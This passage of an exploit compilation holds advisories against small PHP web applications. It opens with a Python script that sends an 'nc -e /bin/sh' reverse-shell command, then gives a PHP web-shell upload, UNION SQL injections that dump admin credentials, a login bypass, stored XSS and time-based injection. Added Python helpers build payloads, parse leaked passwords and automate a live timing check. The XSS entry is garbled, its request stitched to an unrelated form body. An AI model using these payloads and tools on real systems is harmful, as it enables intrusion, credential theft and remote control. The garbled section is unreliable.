          payload = { 'command':'nc -e /bin/sh ' + ip + ' ' + port , 'autoclose':True }
          payload = json.dumps(payload)
          print("[+] Sending payload...")
          send_payload = req.post(page, payload)
          print("[+] Check your listener !...")
      else:
          print("[-] Wrong credentials or may the system patched.")
          exit()
  19. # Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload
      # Date: 22-10-2020
      # Exploit Author: Jyotsna Adhana and Saurav Shukla
      # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
      # Version: 1.0
      # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

      #Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car

      #Exploit
      Fill details
      Create php shell code with below script

      <?php
      if(isset($_REQUEST['cmd'])){
          echo "<pre>";
          $cmd = ($_REQUEST['cmd']);
          system($cmd);
          echo "</pre>";
          die;
      }?>

      Click on Browse
      Select php file
      Click Save
      Access below URL:
      http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo
      add system commands after cmd to execute it.
20. # Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection
# Dork: N/A
# Date: 2020-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 2.1
# Tested on: Linux
# CVE: N/A

# POC:
# 1)
# curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname
curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname
curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email
curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact
#
# <input type="text" class="form-control" name="fname" value="[ID: 1 ] [ Username: xxx ] [ Password: xxx]" >
#
21. #Exploit Title: Point of Sales 1.0 - SQL Injection
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:::
Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1
Step 2: Change the URL to http://localhost:8081/pos/edit_category.php?id=1'
Step 3: Try to balance the query: http://localhost:8081/pos/edit_category.php?id=1'--+
Step 4: Find the number of columns: http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+
Step 5: Find which columns are visible: http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+

Malicious Request:::
GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1

Gives the database name *sourcecodester_posdb*
22. #Exploit Title: lot reservation management system 1.0 - Authentication Bypass
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:::
Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php
Step 2: Use the payload ' or 1=1 limit 1 -- -+ for both username and password.

Malicious Request:::
POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 71
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id

username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B

You will be logged in as admin of the application.
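Added example, not part of Ankita Pal's advisory above or of the application's own code: the same bypass payload run through a string-built login query and through a parameterised one, to show why `' or 1=1 limit 1 -- -+` in both fields returns the first user row. It uses an in-memory SQLite table as a constructed stand-in for the application's user table (the app runs on MySQL/MariaDB, and its real schema is not on this page), so the table and column names are assumptions and the password comparison is simplified to a plain string match.

```python
import sqlite3

# Payload from the advisory above; the same value goes in the username and password fields.
BYPASS = "' or 1=1 limit 1 -- -+"


def make_db():
    """Constructed stand-in for the application's user table (in-memory SQLite, assumed names)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    con.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [
            ("admin", "admin123", "admin"),   # constructed sample rows
            ("clerk", "clerk123", "staff"),
        ],
    )
    return con


def vulnerable_query(username, password):
    """The string-building pattern behind the bypass: user input is spliced straight into the SQL.
    With the payload, `-- ` turns the rest of the statement (including the password check) into a
    comment and `or 1=1 limit 1` selects whatever row comes first."""
    return (
        "SELECT id, username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def vulnerable_login(con, username, password):
    """Returns the row the application would treat as the logged-in user."""
    return con.execute(vulnerable_query(username, password)).fetchone()


def safe_login(con, username, password):
    """Same lookup with bound parameters: the quote and comment in the payload stay data."""
    return con.execute(
        "SELECT id, username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    con = make_db()
    print(vulnerable_query(BYPASS, BYPASS))
    print("string-built query:", vulnerable_login(con, BYPASS, BYPASS))  # first row, the admin
    print("parameterised query:", safe_login(con, BYPASS, BYPASS))       # None
```

The first row returned is whichever the database orders first, so on most installs this lands on the administrator account created at setup; the fix is the bound-parameter form, not filtering the quote character.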
23. # Exploit Title: Gym Management System 1.0 - 'id' SQL Injection
# Date: 22/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# Vulnerable parameter: id

# Injected Request
GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/gym/gym/index.php?page=users
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re

//Comment
The above request will print the database name and the MariaDB version.
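Added example, not from any of the advisories above, covering the UNION-based injections in posts 20, 21 and 23: a helper that builds the `-1' union select ...` payload for a given column count and visible column, a decoder for the `0x..` string literals in Ihsan Sencan's payload so the output format it produces is readable, and a parser that pulls the leaked rows out of the echoed `<input>` value. The field-to-column mapping is read off the four curl commands in post 20; the sample HTML response is constructed, and `sourcecodester`-style field names beyond those four are not assumed.

```python
import re
from html import unescape

# MySQL hex string literal, e.g. 0x3c62723e ("<br>"); must be an even number of hex digits.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)\b")

# From post 20: the profile form echoes these fields, and the 7-column UNION puts the subquery in
# the matching column (1-based). Taken from the four curl commands, which grep for each field.
ECHOED_COLUMNS = {"fname": 2, "lname": 3, "email": 4, "contact": 6}

# The subquery those commands use, with the author's 0x.. literals (spaces instead of the URL '+').
ADMIN_DUMP = (
    "SELECT GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,"
    "0x205d205b20,0x50617373776f72643a20,password,0x5d SEPARATOR 0x3c62723e) FROM admin"
)


def union_payload(n_cols, visible_col, expr, prefix="-1'", filler=None, suffix="-- -"):
    """Build `<prefix> union select c1,...,cN<suffix>` with expr in the 1-based visible column.
    filler=None numbers the columns (as in post 20); filler="NULL" reproduces the gym request."""
    cols = [filler or str(i) for i in range(1, n_cols + 1)]
    # A bare SELECT must be parenthesised to be used as a column expression.
    cols[visible_col - 1] = f"({expr})" if expr.lstrip().upper().startswith("SELECT") else expr
    return f"{prefix} union select {','.join(cols)}{suffix}"


def all_payloads(subquery=ADMIN_DUMP, n_cols=7):
    """One payload per echoed field, matching the four curl commands in post 20."""
    return {field: union_payload(n_cols, col, subquery) for field, col in ECHOED_COLUMNS.items()}


def decode_hex_literals(sql):
    """Replace 0x.. literals with the text they decode to, so the row format is visible."""
    return HEX_LITERAL.sub(lambda m: bytes.fromhex(m.group(1)).decode("utf-8", "replace"), sql)


def parse_leak(html, field):
    """Extract the rows the UNION injected into the named <input> value; rows are joined by the
    0x3c62723e separator, i.e. '<br>', which may also come back HTML-escaped."""
    m = re.search(rf'name="{re.escape(field)}"\s+value="([^"]*)"', html)
    if not m:
        return []
    return [row.strip() for row in unescape(m.group(1)).split("<br>") if row.strip()]


# Constructed response, in the shape the comment at the end of post 20 shows.
SAMPLE_RESPONSE = (
    '<input type="text" class="form-control" name="fname" '
    'value="[ID: 1 ] [ Username: admin ] [ Password: 21232f297a57a5a743894a0e4a801fc3]<br>'
    '[ID: 2 ] [ Username: backup ] [ Password: 5f4dcc3b5aa765d61d8327deb882cf99]" >'
)

if __name__ == "__main__":
    print(decode_hex_literals(ADMIN_DUMP))
    for field, payload in all_payloads().items():
        print(field, "->", payload)
    # Post 23's request, same builder with NULL filler and a numeric id (no quote in the prefix).
    print(union_payload(5, 2, "GROUP_CONCAT(database(),version())", prefix="-1", filler="NULL", suffix="--"))
    for row in parse_leak(SAMPLE_RESPONSE, "fname"):
        print(row)
```

When sending these through curl or a browser, URL-encode the payload (the advisories use `+` for spaces and `%27` for the quote); the builder deliberately produces the raw SQL so it can be inspected first.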
24. #Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
#Version: 1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:::
Step 1: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
Step 2: Use the payload <script>alert("XSS")</script> in Name and Description.

Malicious Request:::
POST /lot-reservation-management-system/admin/ajax.php?action=save_division HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------65714323539404637092301409097
Content-Length: 613
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id

-----------------------------65714323539404637092301409097
Content-Disposition: form-data; name="id"

-----------------------------65714323539404637092301409097
Content-Disposition: form-data; name="name"

<script>alert("XSS")</script>
-----------------------------65714323539404637092301409097
Content-Disposition: form-data; name="description"

<script>alert("XSS")</script>
-----------------------------65714323539404637092301409097
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

-----------------------------65714323539404637092301409097--

-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="gender"

Female
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="contact"

9876543211
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="nid"

12
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="address"

Gujarat
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="dept"

CS
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="degree"

BE
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="salary"

-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

-----------------------------3267707159765331982713791736--

Cookie will be reflected on View Employee.
25. # Exploit Title: Point of Sales 1.0 - 'username' SQL Injection
# Date: 22/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14540&title=Point+of+Sales+in+PHP%2FPDO+with+Full+Source+Code+%282020%29
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# Vulnerable parameter: username

# Injected Request
POST /pos/pos/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: http://localhost
Connection: close
Referer: http://localhost/pos/pos/
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
Upgrade-Insecure-Requests: 1

username=admin' or '1'='1';SELECT SLEEP(5)#&password=admin' or '1'='1#&btn_login=

//Comment
The response will be delayed by 5s.
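Added example, not from Jyotsna Adhana's advisory: a timing check for the injection in post 25 that sends the advisory's username value with the SLEEP length as a parameter and compares median response times against a baseline of normal logins, so that a single slow round-trip cannot produce a false positive. The advisory reports a 5-second delay, so the check assumes the target executes the stacked `;SELECT SLEEP(n)` statement as described. `SimulatedTarget` is a constructed stand-in so the script runs offline; for a live target call `check()` with the real URL and leave `post` at its default (`requests.post`).

```python
import re
import statistics
import time

LOGIN_URL = "http://localhost/pos/pos/"  # from the advisory; change for the target


def timed_payload(seconds):
    """The advisory's username value with the SLEEP length as a parameter."""
    return f"admin' or '1'='1';SELECT SLEEP({seconds})#"


def login_form(username, password="admin' or '1'='1#"):
    """Form fields of the POST in the advisory (btn_login is sent empty)."""
    return {"username": username, "password": password, "btn_login": ""}


def measure(post, url, data, clock=time.monotonic):
    """Seconds one POST takes; `clock` is injectable so the timing logic can be tested offline."""
    start = clock()
    post(url, data=data)
    return clock() - start


def is_delayed(baseline, injected, seconds, slack=0.5):
    """Medians rather than single samples, so one slow request does not fake a positive."""
    return statistics.median(injected) - statistics.median(baseline) >= seconds - slack


def check(url, seconds=5, trials=3, post=None, clock=time.monotonic):
    """Returns (vulnerable?, baseline timings, injected timings)."""
    if post is None:
        import requests  # only needed for a live target
        post = requests.post
    baseline = [measure(post, url, login_form("admin", "admin"), clock) for _ in range(trials)]
    injected = [measure(post, url, login_form(timed_payload(seconds)), clock) for _ in range(trials)]
    return is_delayed(baseline, injected, seconds), baseline, injected


class SimulatedTarget:
    """Constructed stand-in for the POS login: a fixed round-trip, plus the SLEEP length when the
    injected statement 'runs'. Not the application's code."""

    def __init__(self, vulnerable=True, rtt=0.1):
        self.now, self.vulnerable, self.rtt = 0.0, vulnerable, rtt

    def clock(self):
        return self.now

    def post(self, url, data=None):
        self.now += self.rtt
        m = re.search(r"SLEEP\((\d+)\)", (data or {}).get("username", ""))
        if self.vulnerable and m:
            self.now += int(m.group(1))


if __name__ == "__main__":
    target = SimulatedTarget()
    vulnerable, base, inj = check(LOGIN_URL, post=target.post, clock=target.clock)
    print("vulnerable:", vulnerable, "baseline:", base, "injected:", inj)
```

Raise `seconds` or `trials` on a noisy link; the slack of half a second is generous for a local XAMPP install like the one in the advisory and should be reduced if the baseline itself varies by more than that.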